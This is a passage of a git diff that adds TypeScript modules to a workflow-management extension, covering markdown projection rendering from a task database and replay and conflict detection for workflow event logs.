+      .map(e => e.name);
+
+    mdMilestoneCount = milestoneDirs.length;
+
+    for (const mId of milestoneDirs) {
+      const mDir = join(milestonesDir, mId);
+      const roadmapPath = join(mDir, "ROADMAP.md");
+
+      if (existsSync(roadmapPath)) {
+        try {
+          const content = readFileSync(roadmapPath, "utf-8");
+          const roadmap = parseRoadmap(content);
+          mdSliceCount += roadmap.slices.length;
+
+          for (const slice of roadmap.slices) {
+            const planPath = join(mDir, `${slice.id}-PLAN.md`);
+            if (existsSync(planPath)) {
+              try {
+                const planContent = readFileSync(planPath, "utf-8");
+                const plan = parsePlan(planContent);
+                mdTaskCount += plan.tasks.length;
+              } catch (e) {
+                logWarning("migration", `Failed to read plan ${slice.id}-PLAN.md: ${(e as Error).message}`);
+              }
+            }
+          }
+        } catch (e) {
+          logWarning("migration", `Failed to read roadmap for ${mId}: ${(e as Error).message}`);
+        }
+      }
+    }
+  } catch (e) {
+    logWarning("migration", `Validation failed to read markdown: ${(e as Error).message}`);
+    return { discrepancies: ["Failed to read markdown for validation"] };
+  }
+
+  // Compare counts
+  if (engineMilestoneCount !== mdMilestoneCount) {
+    const msg = `Milestone count mismatch: engine=${engineMilestoneCount}, markdown=${mdMilestoneCount}`;
+    discrepancies.push(msg);
+    process.stderr.write(`workflow-migration: ${msg}\n`);
+  }
+
+  if (engineSliceCount !== mdSliceCount) {
+    const msg = `Slice count mismatch: engine=${engineSliceCount}, markdown=${mdSliceCount}`;
+    discrepancies.push(msg);
+    process.stderr.write(`workflow-migration: ${msg}\n`);
+  }
+
+  if (engineTaskCount !== mdTaskCount) {
+    const msg = `Task count mismatch: engine=${engineTaskCount}, markdown=${mdTaskCount}`;
+    discrepancies.push(msg);
+    process.stderr.write(`workflow-migration: ${msg}\n`);
+  }
+
+  return { discrepancies };
+}
diff --git a/src/resources/extensions/gsd/workflow-projections.ts b/src/resources/extensions/gsd/workflow-projections.ts
new file mode 100644
index 000000000..dfa8b170e
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-projections.ts
@@ -0,0 +1,475 @@
+// GSD Extension — Projection Renderers (DB -> Markdown)
+// Renders PLAN.md, ROADMAP.md, SUMMARY.md, and STATE.md from database rows.
+// Projections are read-only views of engine state (Layer 3 of the architecture).
+
+import {
+  _getAdapter,
+  isDbAvailable,
+  getAllMilestones,
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  getVerificationEvidence,
+} from "./gsd-db.js";
+import type { MilestoneRow, SliceRow, TaskRow, VerificationEvidenceRow } from "./gsd-db.js";
+import { atomicWriteSync } from "./atomic-write.js";
+import { join } from "node:path";
+import { mkdirSync, existsSync } from "node:fs";
+import { logWarning } from "./workflow-logger.js";
+import { isClosedStatus } from "./status-guards.js";
+import { deriveState } from "./state.js";
+import type { GSDState } from "./types.js";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────
+
+/**
+ * Strip a leading ID prefix (e.g. "M001: " or "S04: ") from a title
+ * to prevent double-prefixing when the renderer adds its own prefix.
+ * Handles repeated prefixes (e.g. "M001: M001: M001: Title" → "Title").
+ */
+export function stripIdPrefix(title: string, id: string): string {
+  const prefix = `${id}: `;
+  let result = title;
+  while (result.startsWith(prefix)) {
+    result = result.slice(prefix.length);
+  }
+  return result.trim() || title;
+}
+
+// ─── PLAN.md Projection ──────────────────────────────────────────────────
+
+/**
+ * Render PLAN.md content from a slice row and its task rows.
+ * Pure function — no side effects.
+ */
+export function renderPlanContent(sliceRow: SliceRow, taskRows: TaskRow[]): string {
+  const lines: string[] = [];
+
+  const displayTitle = stripIdPrefix(sliceRow.title, sliceRow.id);
+  lines.push(`# ${sliceRow.id}: ${displayTitle}`);
+  lines.push("");
+  // #2945: never use full_summary_md/full_uat_md as display fallbacks —
+  // they contain multi-line rendered markdown that corrupts single-line fields.
+  lines.push(`**Goal:** ${sliceRow.goal || "TBD"}`);
+  lines.push(`**Demo:** After this: ${sliceRow.demo || "TBD"}`);
+  lines.push("");
+  lines.push("## Tasks");
+
+  for (const task of taskRows) {
+    const checkbox = isClosedStatus(task.status) ? "[x]" : "[ ]";
+    lines.push(`- ${checkbox} **${task.id}: ${task.title}** \u2014 ${task.description}`);
+
+    // Estimate subline (always present if non-empty)
+    if (task.estimate) {
+      lines.push(`  - Estimate: ${task.estimate}`);
+    }
+
+    // Files subline (only if non-empty array)
+    if (task.files && task.files.length > 0) {
+      lines.push(`  - Files: ${task.files.join(", ")}`);
+    }
+
+    // Verify subline (only if non-null)
+    if (task.verify) {
+      lines.push(`  - Verify: ${task.verify}`);
+    }
+
+    // Duration subline (only if recorded)
+    if (task.duration) {
+      lines.push(`  - Duration: ${task.duration}`);
+    }
+
+    // Blocker subline (if discovered)
+    if (task.blocker_discovered && task.known_issues) {
+      lines.push(`  - Blocker: ${task.known_issues}`);
+    }
+  }
+
+  lines.push("");
+  return lines.join("\n");
+}
+
+/**
+ * Render PLAN.md projection to disk for a specific slice.
+ * Queries DB via helper functions, renders content, writes via atomicWriteSync.
+ */
+export function renderPlanProjection(basePath: string, milestoneId: string, sliceId: string): void {
+  const sliceRows = getMilestoneSlices(milestoneId);
+  const sliceRow = sliceRows.find(s => s.id === sliceId);
+  if (!sliceRow) return;
+
+  const taskRows = getSliceTasks(milestoneId, sliceId);
+
+  const content = renderPlanContent(sliceRow, taskRows);
+  const dir = join(basePath, ".gsd", "milestones", milestoneId, "slices", sliceId);
+  mkdirSync(dir, { recursive: true });
+  atomicWriteSync(join(dir, `${sliceId}-PLAN.md`), content);
+}
+
+// ─── ROADMAP.md Projection ───────────────────────────────────────────────
+
+/**
+ * Render ROADMAP.md content from a milestone row and its slice rows.
+ * Pure function — no side effects.
+ */
+export function renderRoadmapContent(milestoneRow: MilestoneRow, sliceRows: SliceRow[]): string {
+  const lines: string[] = [];
+
+  const displayTitle = stripIdPrefix(milestoneRow.title, milestoneRow.id);
+  lines.push(`# ${milestoneRow.id}: ${displayTitle}`);
+  lines.push("");
+  lines.push("## Vision");
+  lines.push(milestoneRow.vision || milestoneRow.title || "TBD");
+  lines.push("");
+  lines.push("## Slice Overview");
+  lines.push("| ID | Slice | Risk | Depends | Done | After this |");
+  lines.push("|----|-------|------|---------|------|------------|");
+
+  for (const slice of sliceRows) {
+    const done = isClosedStatus(slice.status) ? "\u2705" : "\u2B1C";
+
+    // depends is already parsed to string[] by rowToSlice
+    let depends = "\u2014";
+    if (slice.depends && slice.depends.length > 0) {
+      depends = slice.depends.join(", ");
+    }
+
+    const risk = (slice.risk || "low").toLowerCase();
+    // #2945 Bug 1: never use full_uat_md as a table cell fallback — it contains
+    // multi-line UAT content (preconditions, steps, expected results) that
+    // corrupts the markdown table and makes subsequent slices invisible.
+    const demo = slice.demo || "TBD";
+
+    lines.push(`| ${slice.id} | ${slice.title} | ${risk} | ${depends} | ${done} | ${demo} |`);
+  }
+
+  lines.push("");
+  return lines.join("\n");
+}
+
+/**
+ * Render ROADMAP.md projection to disk for a specific milestone.
+ * Queries DB via helper functions, renders content, writes via atomicWriteSync.
+ */
+export function renderRoadmapProjection(basePath: string, milestoneId: string): void {
+  const milestoneRow = getMilestone(milestoneId);
+  if (!milestoneRow) return;
+
+  const sliceRows = getMilestoneSlices(milestoneId);
+
+  const content = renderRoadmapContent(milestoneRow, sliceRows);
+  const dir = join(basePath, ".gsd", "milestones", milestoneId);
+  mkdirSync(dir, { recursive: true });
+  atomicWriteSync(join(dir, `${milestoneId}-ROADMAP.md`), content);
+}
+
+// ─── SUMMARY.md Projection ──────────────────────────────────────────────
+
+/**
+ * Render SUMMARY.md content from a task row.
+ * Single source of truth for summary rendering — used both at completion
+ * time and at projection regeneration time (#2720).
+ *
+ * @param evidence - Optional verification evidence rows. When called from
+ *   complete-task, these are passed directly. When called from projection
+ *   regeneration, they are queried from the DB by renderSummaryProjection.
+ */
+export function renderSummaryContent(
+  taskRow: TaskRow,
+  sliceId: string,
+  milestoneId: string,
+  evidence?: Array<{ command: string; exitCode?: number; exit_code?: number; verdict: string; durationMs?: number; duration_ms?: number }>,
+): string {
+  // ── Frontmatter (YAML list format, matches parseSummary() expectations) ──
+  const keyFilesYaml = taskRow.key_files && taskRow.key_files.length > 0
+    ? taskRow.key_files.map(f => `  - ${f}`).join("\n")
+    : "  - (none)";
+  const keyDecisionsYaml = taskRow.key_decisions && taskRow.key_decisions.length > 0
+    ? taskRow.key_decisions.map(d => `  - ${d}`).join("\n")
+    : "  - (none)";
+
+  // Derive verification_result from evidence if available
+  const evidenceList = evidence ?? [];
+  const allPassed = evidenceList.length > 0 &&
+    evidenceList.every(e => {
+      const code = e.exitCode ?? e.exit_code ?? -1;
+      return code === 0 || e.verdict.includes("\u2705") || e.verdict.toLowerCase().includes("pass");
+    });
+  const verificationResult = taskRow.verification_result
+    ? (allPassed ? "passed" : (evidenceList.length === 0 ? "untested" : "mixed"))
+    : (allPassed ? "passed" : (evidenceList.length === 0 ? "untested" : "mixed"));
+
+  // Build verification evidence table
+  let evidenceTable = "| # | Command | Exit Code | Verdict | Duration |\n|---|---------|-----------|---------|----------|\n";
+  if (evidenceList.length > 0) {
+    evidenceList.forEach((e, i) => {
+      const code = e.exitCode ?? e.exit_code ?? 0;
+      const dur = e.durationMs ?? e.duration_ms ?? 0;
+      evidenceTable += `| ${i + 1} | \`${e.command}\` | ${code} | ${e.verdict} | ${dur}ms |\n`;
+    });
+  } else {
+    evidenceTable += "| \u2014 | No verification commands discovered | \u2014 | \u2014 | \u2014 |\n";
+  }
+
+  const title = taskRow.one_liner || taskRow.title || taskRow.id;
+
+  return `---
+id: ${taskRow.id}
+parent: ${sliceId}
+milestone: ${milestoneId}
+key_files:
+${keyFilesYaml}
+key_decisions:
+${keyDecisionsYaml}
+duration: ${taskRow.duration || ""}
+verification_result: ${verificationResult}
+completed_at: ${taskRow.completed_at || ""}
+blocker_discovered: ${taskRow.blocker_discovered ? "true" : "false"}
+---
+
+# ${taskRow.id}: ${title}
+
+**${taskRow.one_liner || ""}**
+
+## What Happened
+
+${taskRow.narrative || "No summary recorded."}
+
+## Verification
+
+${taskRow.verification_result || "No verification recorded."}
+
+## Verification Evidence
+
+${evidenceTable}
+## Deviations
+
+${taskRow.deviations || "None."}
+
+## Known Issues
+
+${taskRow.known_issues || "None."}
+
+## Files Created/Modified
+
+${taskRow.key_files && taskRow.key_files.length > 0 ? taskRow.key_files.map(f => `- \`${f}\``).join("\n") : "None."}
+`;
+}
+
+/**
+ * Render SUMMARY.md projection to disk for a specific task.
+ * Queries DB via helper functions, renders content, writes via atomicWriteSync.
+ */
+export function renderSummaryProjection(basePath: string, milestoneId: string, sliceId: string, taskId: string): void {
+  const taskRows = getSliceTasks(milestoneId, sliceId);
+  const taskRow = taskRows.find(t => t.id === taskId);
+  if (!taskRow) return;
+
+  const evidenceRows = getVerificationEvidence(milestoneId, sliceId, taskId);
+  const content = renderSummaryContent(taskRow, sliceId, milestoneId, evidenceRows);
+  const dir = join(basePath, ".gsd", "milestones", milestoneId, "slices", sliceId, "tasks");
+  mkdirSync(dir, { recursive: true });
+  atomicWriteSync(join(dir, `${taskId}-SUMMARY.md`), content);
+}
+
+// ─── STATE.md Projection ────────────────────────────────────────────────
+
+/**
+ * Render STATE.md content from GSDState.
+ * Matches the buildStateMarkdown output format from doctor.ts exactly.
+ * Pure function — no side effects.
+ */
+export function renderStateContent(state: GSDState): string {
+  const lines: string[] = [];
+  lines.push("# GSD State", "");
+
+  const activeSlice = state.activeSlice
+    ? `${state.activeSlice.id}: ${stripIdPrefix(state.activeSlice.title, state.activeSlice.id)}`
+    : "None";
+
+  if (state.phase === 'complete' && state.lastCompletedMilestone) {
+    lines.push(`**Last Completed Milestone:** ${state.lastCompletedMilestone.id}: ${state.lastCompletedMilestone.title}`);
+  } else {
+    const activeMilestone = state.activeMilestone
+      ? `${state.activeMilestone.id}: ${stripIdPrefix(state.activeMilestone.title, state.activeMilestone.id)}`
+      : "None";
+    lines.push(`**Active Milestone:** ${activeMilestone}`);
+  }
+  lines.push(`**Active Slice:** ${activeSlice}`);
+  lines.push(`**Phase:** ${state.phase}`);
+  if (state.requirements) {
+    lines.push(`**Requirements Status:** ${state.requirements.active} active \u00b7 ${state.requirements.validated} validated \u00b7 ${state.requirements.deferred} deferred \u00b7 ${state.requirements.outOfScope} out of scope`);
+  }
+  lines.push("");
+  lines.push("## Milestone Registry");
+
+  for (const entry of state.registry) {
+    const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C";
+    lines.push(`- ${glyph} **${entry.id}:** ${stripIdPrefix(entry.title, entry.id)}`);
+  }
+
+  lines.push("");
+  lines.push("## Recent Decisions");
+  if (state.recentDecisions.length > 0) {
+    for (const decision of state.recentDecisions) lines.push(`- ${decision}`);
+  } else {
+    lines.push("- None recorded");
+  }
+
+  lines.push("");
+  lines.push("## Blockers");
+  if (state.blockers.length > 0) {
+    for (const blocker of state.blockers) lines.push(`- ${blocker}`);
+  } else {
+    lines.push("- None");
+  }
+
+  lines.push("");
+  lines.push("## Next Action");
+  lines.push(state.nextAction || "None");
+  lines.push("");
+
+  return lines.join("\n");
+}
+
+/**
+ * Render STATE.md projection to disk.
+ * Derives state from DB, renders content, writes via atomicWriteSync.
+ */
+export async function renderStateProjection(basePath: string): Promise<void> {
+  try {
+    if (!isDbAvailable()) return;
+    // Probe DB handle — adapter may be set but underlying handle closed
+    const adapter = _getAdapter();
+    if (!adapter) return;
+    try { adapter.prepare("SELECT 1").get(); } catch { return; }
+    const state = await deriveState(basePath);
+    const content = renderStateContent(state);
+    const dir = join(basePath, ".gsd");
+    mkdirSync(dir, { recursive: true });
+    atomicWriteSync(join(dir, "STATE.md"), content);
+  } catch (err) {
+    logWarning("projection", `renderStateProjection failed: ${(err as Error).message}`);
+  }
+}
+
+// ─── renderAllProjections ───────────────────────────────────────────────
+
+/**
+ * Regenerate all projection files for a milestone from DB state.
+ * All calls are wrapped in try/catch — projection failure is non-fatal per D-02.
+ */
+export async function renderAllProjections(basePath: string, milestoneId: string): Promise<void> {
+  // Render ROADMAP.md for the milestone
+  try {
+    renderRoadmapProjection(basePath, milestoneId);
+  } catch (err) {
+    logWarning("projection", `renderRoadmapProjection failed for ${milestoneId}: ${(err as Error).message}`);
+  }
+
+  // Query all slices for this milestone
+  const sliceRows = getMilestoneSlices(milestoneId);
+
+  for (const slice of sliceRows) {
+    // PLAN.md is rendered by the authoritative markdown-renderer.js in
+    // plan-slice/replan-slice tools. Do NOT overwrite it here — the simplified
+    // projection is missing key sections (Must-Haves, Verification, Files
+    // Likely Touched) and corrupts multi-line task descriptions (#3651).
+
+    // Render SUMMARY.md for each completed task
+    const taskRows = getSliceTasks(milestoneId, slice.id);
+    const doneTasks = taskRows.filter(t => t.status === "done" || t.status === "complete");
+
+    for (const task of doneTasks) {
+      try {
+        renderSummaryProjection(basePath, milestoneId, slice.id, task.id);
+      } catch (err) {
+        logWarning("projection", `renderSummaryProjection failed for ${milestoneId}/${slice.id}/${task.id}: ${(err as Error).message}`);
+      }
+    }
+  }
+
+  // Render STATE.md
+  try {
+    await renderStateProjection(basePath);
+  } catch (err) {
+    logWarning("projection", `renderStateProjection failed: ${(err as Error).message}`);
+  }
+}
+
+// ─── regenerateIfMissing ────────────────────────────────────────────────
+
+/**
+ * Check if a projection file exists on disk. If missing, regenerate it from DB.
+ * Returns true if the file was regenerated, false if it already existed.
+ * Satisfies PROJ-05 (corrupted/deleted projections regenerate on demand).
+ */
+export function regenerateIfMissing(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  fileType: "PLAN" | "ROADMAP" | "SUMMARY" | "STATE",
+): boolean {
+  let filePath: string;
+
+  switch (fileType) {
+    case "PLAN":
+      filePath = join(basePath, ".gsd", "milestones", milestoneId, "slices", sliceId, `${sliceId}-PLAN.md`);
+      break;
+    case "ROADMAP":
+      filePath = join(basePath, ".gsd", "milestones", milestoneId, `${milestoneId}-ROADMAP.md`);
+      break;
+    case "SUMMARY":
+      // For SUMMARY, we regenerate all task summaries in the slice
+      filePath = join(basePath, ".gsd", "milestones", milestoneId, "slices", sliceId, "tasks");
+      break;
+    case "STATE":
+      filePath = join(basePath, ".gsd", "STATE.md");
+      break;
+  }
+
+  if (fileType === "SUMMARY") {
+    // Check each completed task's SUMMARY file individually (not just the directory)
+    const taskRows = getSliceTasks(milestoneId, sliceId);
+    const doneTasks = taskRows.filter(t => t.status === "done" || t.status === "complete");
+    let regenerated = 0;
+    for (const task of doneTasks) {
+      const summaryPath = join(basePath, ".gsd", "milestones", milestoneId, "slices", sliceId, "tasks", `${task.id}-SUMMARY.md`);
+      if (!existsSync(summaryPath)) {
+        try {
+          renderSummaryProjection(basePath, milestoneId, sliceId, task.id);
+          regenerated++;
+        } catch (err) {
+          logWarning("projection", `regenerateIfMissing SUMMARY failed for ${task.id}: ${(err as Error).message}`);
+        }
+      }
+    }
+    return regenerated > 0;
+  }
+
+  if (existsSync(filePath)) {
+    return false;
+  }
+
+  // Regenerate the missing file
+  try {
+    switch (fileType) {
+      case "PLAN":
+        renderPlanProjection(basePath, milestoneId, sliceId);
+        break;
+      case "ROADMAP":
+        renderRoadmapProjection(basePath, milestoneId);
+        break;
+      case "STATE":
+        // renderStateProjection is async — fire-and-forget.
+        // Return false since the file isn't written yet; it will appear
+        // on the next post-mutation hook cycle.
+        void renderStateProjection(basePath);
+        return false;
+    }
+    return true;
+  } catch (err) {
+    logWarning("projection", `regenerateIfMissing ${fileType} failed: ${(err as Error).message}`);
+    return false;
+  }
+}
diff --git a/src/resources/extensions/gsd/workflow-reconcile.ts b/src/resources/extensions/gsd/workflow-reconcile.ts
new file mode 100644
index 000000000..9f304cfbb
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-reconcile.ts
@@ -0,0 +1,681 @@
+import { join } from "node:path";
+import { mkdirSync, existsSync, readFileSync, unlinkSync } from "node:fs";
+import { logWarning, logError } from "./workflow-logger.js";
+import { readEvents, findForkPoint, getSessionId } from "./workflow-events.js";
+import type { WorkflowEvent } from "./workflow-events.js";
+import {
+  transaction,
+  updateTaskStatus,
+  updateSliceStatus,
+  updateMilestoneStatus,
+  getSliceTasks,
+  insertMilestone,
+  _getAdapter,
+  getMilestoneSlices,
+  insertVerificationEvidence,
+  upsertDecision,
+  openDatabase,
+  setTaskBlockerDiscovered,
+} from "./gsd-db.js";
+import { isClosedStatus } from "./status-guards.js";
+import { invalidateStateCache } from "./state.js";
+import { clearPathCache } from "./paths.js";
+import { clearParseCache } from "./files.js";
+import { writeManifest } from "./workflow-manifest.js";
+import { atomicWriteSync } from "./atomic-write.js";
+import { acquireSyncLock, releaseSyncLock } from "./sync-lock.js";
+
+// ─── Replay Helpers ──────────────────────────────────────────────────────────
+
+/**
+ * Replay a complete_slice event with task validation.
+ *
+ * #2945 Bug 2: The original replay blindly called updateSliceStatus("done")
+ * without checking whether all tasks in the slice are actually complete.
+ * During API overload or partial execution, a complete_slice event could
+ * be logged even when tasks were skipped, causing the milestone completion
+ * guard to see the slice as "done" and allow premature milestone completion.
+ *
+ * This function validates that every task in the slice has a closed status
+ * before marking the slice as done. If any task is still pending, the slice
+ * status is left unchanged.
+ */
+export function replaySliceComplete(milestoneId: string, sliceId: string, ts: string): void {
+  const tasks = getSliceTasks(milestoneId, sliceId);
+  // If there are tasks and any are not closed, skip the status update
+  if (tasks.length > 0) {
+    const incompleteTasks = tasks.filter(t => !isClosedStatus(t.status));
+    if (incompleteTasks.length > 0) {
+      process.stderr.write(
+        `[gsd] reconcile: skipping complete_slice replay for ${sliceId} — ` +
+        `${incompleteTasks.length} task(s) still pending\n`,
+      );
+      return;
+    }
+  }
+  updateSliceStatus(milestoneId, sliceId, "done", ts);
+}
+
+// ─── Public Types ─────────────────────────────────────────────────────────────
+
+export interface ConflictEntry {
+  entityType: string;
+  entityId: string;
+  mainSideEvents: WorkflowEvent[];
+  worktreeSideEvents: WorkflowEvent[];
+}
+
+export interface ReconcileResult {
+  autoMerged: number;
+  conflicts: ConflictEntry[];
+}
+
+// ─── replayEvents ─────────────────────────────────────────────────────────────
+
+/**
+ * Replay a list of WorkflowEvents by dispatching each to the appropriate
+ * gsd-db function.  This replaces the old engine.replayAll() pattern with
+ * direct DB calls.
+ */
+function replayEvents(events: WorkflowEvent[]): void {
+  transaction(() => {
+  for (const event of events) {
+    const p = event.params;
+    // Normalize cmd format: completion tools write hyphens ("complete-task"),
+    // legacy logs use underscores ("complete_task"). Accept both formats.
+    // Type guard: malformed event lines with non-string cmd are skipped.
+    if (typeof event.cmd !== "string") {
+      logWarning("reconcile", `Event with non-string cmd skipped: ${JSON.stringify(event.cmd)}`);
+      continue;
+    }
+    const cmd = event.cmd.replace(/-/g, "_");
+    switch (cmd) {
+      case "complete_task": {
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        const taskId = p["taskId"] as string;
+        updateTaskStatus(milestoneId, sliceId, taskId, "done", event.ts);
+        break;
+      }
+      case "start_task": {
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        const taskId = p["taskId"] as string;
+        updateTaskStatus(milestoneId, sliceId, taskId, "in-progress", event.ts);
+        break;
+      }
+      case "report_blocker": {
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        const taskId = p["taskId"] as string;
+        updateTaskStatus(milestoneId, sliceId, taskId, "blocked");
+        setTaskBlockerDiscovered(milestoneId, sliceId, taskId, true);
+        break;
+      }
+      case "record_verification": {
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        const taskId = p["taskId"] as string;
+        insertVerificationEvidence({
+          taskId,
+          sliceId,
+          milestoneId,
+          command: (p["command"] as string) ?? "",
+          exitCode: (p["exitCode"] as number) ?? 0,
+          verdict: (p["verdict"] as string) ?? "",
+          durationMs: (p["durationMs"] as number) ?? 0,
+        });
+        break;
+      }
+      case "complete_slice": {
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        // #2945 Bug 2: validate tasks before marking slice done
+        replaySliceComplete(milestoneId, sliceId, event.ts);
+        break;
+      }
+      case "complete_milestone": {
+        const milestoneId = p["milestoneId"] as string;
+        if (!milestoneId) break;
+        // Invariant check: only mark complete if all slices are closed.
+        // Without this guard, a reordered/partial event stream could close
+        // a milestone while work is still incomplete.
+        const mSlices = getMilestoneSlices(milestoneId);
+        const allClosed = mSlices.length === 0 || mSlices.every(s => isClosedStatus(s.status));
+        if (allClosed) {
+          updateMilestoneStatus(milestoneId, "complete", event.ts);
+        } else {
+          logWarning("reconcile", `Skipping complete_milestone replay for ${milestoneId}: not all slices are closed`);
+        }
+        break;
+      }
+      case "plan_milestone": {
+        // Replay milestone creation — uses INSERT OR IGNORE (gsd-db's insertMilestone is safe)
+        const mId = p["milestoneId"] as string;
+        if (mId) {
+          insertMilestone({ id: mId, title: (p["title"] as string) ?? mId });
+        }
+        break;
+      }
+      case "plan_slice": {
+        // Replay slice creation — strict INSERT OR IGNORE to avoid overwriting
+        // progressed status. insertSlice() uses ON CONFLICT DO UPDATE which
+        // could downgrade a completed slice back to pending.
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        if (milestoneId && sliceId) {
+          const adapter = _getAdapter();
+          if (adapter) {
+            adapter.prepare(
+              `INSERT OR IGNORE INTO slices (milestone_id, id, title, status, created_at)
+               VALUES (:mid, :sid, :title, 'pending', :ts)`,
+            ).run({ ":mid": milestoneId, ":sid": sliceId, ":title": (p["title"] as string) ?? sliceId, ":ts": event.ts });
+          }
+        }
+        break;
+      }
+      case "plan_task": {
+        // Replay task creation — strict INSERT OR IGNORE to avoid overwriting
+        // progressed status. insertTask() uses ON CONFLICT DO UPDATE which
+        // could downgrade a done/in-progress task back to pending.
+        const milestoneId = p["milestoneId"] as string;
+        const sliceId = p["sliceId"] as string;
+        const taskId = p["taskId"] as string;
+        if (milestoneId && sliceId && taskId) {
+          const adapter = _getAdapter();
+          if (adapter) {
+            adapter.prepare(
+              `INSERT OR IGNORE INTO tasks (milestone_id, slice_id, id, title, status, created_at)
+               VALUES (:mid, :sid, :tid, :title, 'pending', :ts)`,
+            ).run({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId, ":title": (p["title"] as string) ?? taskId, ":ts": event.ts });
+          }
+        }
+        break;
+      }
+      case "replan_slice": {
+        // Informational — replan events don't mutate DB during replay
+        break;
+      }
+      case "save_decision": {
+        upsertDecision({
+          id: (p["id"] as string) ?? `${p["scope"]}:${p["decision"]}`,
+          when_context: (p["when_context"] as string) ?? (p["whenContext"] as string) ?? "",
+          scope: (p["scope"] as string) ?? "",
+          decision: (p["decision"] as string) ?? "",
+          choice: (p["choice"] as string) ?? "",
+          rationale: (p["rationale"] as string) ?? "",
+          revisable: (p["revisable"] as string) ?? "yes",
+          made_by: ((p["made_by"] as string) ?? (p["madeBy"] as string) ?? "agent") as "agent",
+          superseded_by: (p["superseded_by"] as string) ?? (p["supersededBy"] as string) ?? null,
+        });
+        break;
+      }
+      default:
+        logWarning("reconcile", `Unknown event cmd during replay: "${event.cmd}" — skipped`);
+        break;
+    }
+  }
+  }); // end transaction
+}
+
+// ─── extractEntityKey ─────────────────────────────────────────────────────────
+
+/**
+ * Map a WorkflowEvent command to its affected entity type and ID.
+ * Returns null for commands that don't touch a named entity
+ * (e.g. unknown or future cmds).
+ */
+export function extractEntityKey(
+  event: WorkflowEvent,
+): { type: string; id: string } | null {
+  const p = event.params;
+  // Normalize cmd format: accept both hyphens and underscores
+  if (typeof event.cmd !== "string") return null;
+  const cmd = event.cmd.replace(/-/g, "_");
+
+  switch (cmd) {
+    case "complete_task":
+    case "start_task":
+    case "report_blocker":
+    case "record_verification":
+    case "plan_task":
+      return typeof p["taskId"] === "string"
+        ? { type: "task", id: p["taskId"] }
+        : null;
+
+    case "complete_slice":
+    case "replan_slice":
+      return typeof p["sliceId"] === "string"
+        ? { type: "slice", id: p["sliceId"] }
+        : null;
+
+    case "plan_slice":
+      return typeof p["sliceId"] === "string"
+        ? { type: "slice_plan", id: p["sliceId"] }
+        : null;
+
+    case "complete_milestone":
+    case "plan_milestone":
+      return typeof p["milestoneId"] === "string"
+        ? { type: "milestone", id: p["milestoneId"] }
+        : null;
+
+    case "save_decision":
+      if (typeof p["scope"] === "string" && typeof p["decision"] === "string") {
+        return { type: "decision", id: `${p["scope"]}:${p["decision"]}` };
+      }
+      return null;
+
+    default:
+      return null;
+  }
+}
+
+// ─── detectConflicts ──────────────────────────────────────────────────────────
+
+/**
+ * Compare two sets of diverged events. Returns conflict entries for any
+ * entity touched by both sides.
+ *
+ * Entity-level granularity: if both sides touched task T01 (with any cmd),
+ * that is one conflict regardless of field-level differences.
+ */
+export function detectConflicts(
+  mainDiverged: WorkflowEvent[],
+  wtDiverged: WorkflowEvent[],
+): ConflictEntry[] {
+  // Group each side's events by entity key
+  const mainByEntity = new Map<string, WorkflowEvent[]>();
+  for (const event of mainDiverged) {
+    const key = extractEntityKey(event);
+    if (!key) continue;
+    const bucket = mainByEntity.get(`${key.type}:${key.id}`) ?? [];
+    bucket.push(event);
+    mainByEntity.set(`${key.type}:${key.id}`, bucket);
+  }
+
+  const wtByEntity = new Map<string, WorkflowEvent[]>();
+  for (const event of wtDiverged) {
+    const key = extractEntityKey(event);
+    if (!key) continue;
+    const bucket = wtByEntity.get(`${key.type}:${key.id}`) ?? [];
+    bucket.push(event);
+    wtByEntity.set(`${key.type}:${key.id}`, bucket);
+  }
+
+  // Find entities touched by both sides
+  const conflicts: ConflictEntry[] = [];
+  for (const [entityKey, mainEvents] of mainByEntity) {
+    const wtEvents = wtByEntity.get(entityKey);
+    if (!wtEvents) continue;
+
+    const colonIdx = entityKey.indexOf(":");
+    const entityType = entityKey.slice(0, colonIdx);
+    const entityId = entityKey.slice(colonIdx + 1);
+
+    conflicts.push({
+      entityType,
+      entityId,
+      mainSideEvents: mainEvents,
+      worktreeSideEvents: wtEvents,
+    });
+  }
+
+  return conflicts;
+}
+
+function rewriteDivergedEventsForEntity(
+  divergedEvents: WorkflowEvent[],
+  entityType: string,
+  entityId: string,
+  replacementEvents: WorkflowEvent[],
+): WorkflowEvent[] {
+  const rewritten: WorkflowEvent[] = [];
+  let inserted = false;
+
+  for (const event of divergedEvents) {
+    const key = extractEntityKey(event);
+    if (key?.type === entityType && key.id === entityId) {
+      if (!inserted) {
+        rewritten.push(...replacementEvents);
+        inserted = true;
+      }
+      continue;
+    }
+    rewritten.push(event);
+  }
+
+  if (!inserted) {
+    rewritten.push(...replacementEvents);
+  }
+
+  return rewritten;
+}
+
+function writeEventLog(basePath: string, events: WorkflowEvent[]): void {
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+  const content = events.map((e) => JSON.stringify(e)).join("\n") + (events.length > 0 ? "\n" : "");
+  atomicWriteSync(join(dir, "event-log.jsonl"), content);
+}
+
+// ─── writeConflictsFile ───────────────────────────────────────────────────────
+
+/**
+ * Write a human-readable CONFLICTS.md to basePath/.gsd/CONFLICTS.md.
+ * Lists each conflict with both sides' event payloads and resolution instructions.
+ */
+export function writeConflictsFile(
+  basePath: string,
+  conflicts: ConflictEntry[],
+  worktreePath: string,
+): void {
+  const timestamp = new Date().toISOString();
+  const lines: string[] = [
+    `# Merge Conflicts — ${timestamp}`,
+    "",
+    `Conflicts detected merging worktree \`${worktreePath}\` into \`${basePath}\`.`,
+    `Run \`gsd resolve-conflict\` to resolve each conflict.`,
+    "",
+  ];
+
+  conflicts.forEach((conflict, idx) => {
